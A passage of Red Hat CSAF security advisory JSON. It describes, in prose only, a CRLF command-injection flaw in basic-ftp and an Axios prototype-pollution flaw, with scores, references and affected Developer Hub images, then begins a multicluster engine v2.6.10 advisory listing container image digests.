[{"system_name": "Red Hat Bugzilla ID", "text": "2456971"}], "notes": [{"category": "description", "text": "A flaw was found in basic-ftp, an FTP client for Node.js. A remote attacker can exploit this vulnerability by injecting Carriage Return Line Feed (CRLF) sequences into file path parameters used by high-level APIs. This allows the attacker to split a single intended FTP command into multiple commands. Such command injection can lead to the execution of arbitrary commands, potentially compromising the integrity and availability of data or the system.", "title": "Vulnerability description"}, {"category": "summary", "text": "basic-ftp: basic-ftp: Command injection via CRLF sequences in file path parameters", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-39983"}, {"category": "external", "summary": "RHBZ#2456971", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456971"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39983", "url": "https://www.cve.org/CVERecord?id=CVE-2026-39983"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"}, {"category": "external", "summary": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b", "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"}, {"category": "external", "summary": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1", "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"}, {"category": "external", "summary": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q", "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"}], "release_date": "2026-04-09T17:05:46.228000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "basic-ftp: basic-ftp: Command injection via CRLF sequences in file path parameters"}, {"cve": "CVE-2026-40175", "cwe": {"id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"}, "discovery_date": "2026-04-10T20:02:10.296601+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2457432"}], "notes": [{"category": "description", "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability, known as Prototype Pollution, can be exploited through a specific \"Gadget\" attack chain. This allows an attacker to escalate a Prototype Pollution vulnerability in a third-party dependency, potentially leading to remote code execution or a full cloud compromise, such as bypassing AWS IMDSv2.", "title": "Vulnerability description"}, {"category": "summary", "text": "axios: Axios: Remote Code Execution via Prototype Pollution escalation", "title": "Vulnerability summary"}, {"category": "other", "text": "The Axios library, a promise-based HTTP client, is susceptible to an Important prototype pollution vulnerability. This flaw, when combined with specific \"Gadget\" attack chains in third-party dependencies, can lead to remote code execution or full cloud compromise, including bypassing AWS IMDSv2.\n \nWith pollution check patch available in Axios gives an advantage, it remains vulnerable due to HTTP Header Sanitation and Server-Side Request Forgery threat.\n\nRed Hat products that incorporate the vulnerable Axios library are affected.\n\nThe openshift4/ose-monitoring-plugin-rhel9 container image is not vulnerable to this flaw. The affected component is used as a build-time dependency but it's not shipped in the final product, meaning the flaw is not present thus cannot be exploited in the container deployments.\n\nRegarding openshift4/ose-console for Product stream 4.12 and 4.13, the vulnerable component is present (indirect dependency), but the vulnerability is not exploitable in our case due to the browser runtime, where the required Node.js-specific attack vectors are not available. With this, the impact becomes low.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-40175"}, {"category": "external", "summary": "RHBZ#2457432", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457432"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40175", "url": "https://www.cve.org/CVERecord?id=CVE-2026-40175"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"}, {"category": "external", "summary": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1", "url": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"}, {"category": "external", "summary": "https://github.com/axios/axios/pull/10660", "url": "https://github.com/axios/axios/pull/10660"}, {"category": "external", "summary": "https://github.com/axios/axios/releases/tag/v1.15.0", "url": "https://github.com/axios/axios/releases/tag/v1.15.0"}, {"category": "external", "summary": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx", "url": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"}], "release_date": "2026-04-10T19:23:52.285000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9742"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "The multicluster engine for Kubernetes 2.6 General Availability release images,\nwhich add new features and enhancements, bug fixes, and updated container images.", "title": "Topic"}, {"category": "general", "text": "The multicluster engine for Kubernetes v2.6 images\n\nThe multicluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds.\n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9848", "url": "https://access.redhat.com/errata/RHSA-2026:9848"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-13465", "url": "https://access.redhat.com/security/cve/CVE-2025-13465"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-61726", "url": "https://access.redhat.com/security/cve/CVE-2025-61726"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-61729", "url": "https://access.redhat.com/security/cve/CVE-2025-61729"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2025-68121", "url": "https://access.redhat.com/security/cve/CVE-2025-68121"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-22029", "url": "https://access.redhat.com/security/cve/CVE-2026-22029"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-25639", "url": "https://access.redhat.com/security/cve/CVE-2026-25639"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-29063", "url": "https://access.redhat.com/security/cve/CVE-2026-29063"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/", "url": "https://access.redhat.com/security/updates/classification/"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9848.json"}], "title": "Red Hat Security Advisory: multicluster engine for Kubernetes v2.6.10 security update", "tracking": {"current_release_date": "2026-06-08T15:52:52+00:00", "generator": {"date": "2026-06-08T15:52:52+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9848", "initial_release_date": "2026-04-22T17:54:30+00:00", "revision_history": [{"date": "2026-04-22T17:54:30+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-22T17:54:41+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:52+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "multicluster engine for Kubernetes 2.6", "product": {"name": "multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6", "product_identification_helper": {"cpe": "cpe:/a:redhat:multicluster_engine:2.6::el9"}}}], "category": "product_family", "name": "multicluster engine for Kubernetes"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "product_identification_helper": {"purl": "pkg:oci/addon-manager-rhel9@sha256%3A407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775977126"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "product_identification_helper": {"purl": "pkg:oci/must-gather-rhel9@sha256%3A222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776434265"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "product_identification_helper": {"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775678862"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776038312"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382931"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776210187"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Af0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775826440"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3A212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382976"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Ae7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776382929"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "product_identification_helper": {"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3Ada99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776296503"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "product_identification_helper": {"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775864344"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "product_identification_helper": {"purl": "pkg:oci/console-mce-rhel9@sha256%3A394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776223790"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "product_identification_helper": {"purl": "pkg:oci/discovery-rhel9@sha256%3A9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776103237"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "product_identification_helper": {"purl": "pkg:oci/hive-rhel9@sha256%3Aedc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776286716"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "product_identification_helper": {"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Abcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775691813"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "product_identification_helper": {"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Ab9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775950593"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "product_identification_helper": {"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775950592"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "product_identification_helper": {"purl": "pkg:oci/image-based-install-rhel9@sha256%3A0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1776469416"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "product_identification_helper": {"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Adf9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f?arch=amd64&repository_url=registry.redhat.io/multicluster-engine&tag=1775736638"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "product": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "product_identification_helper": {"purl": 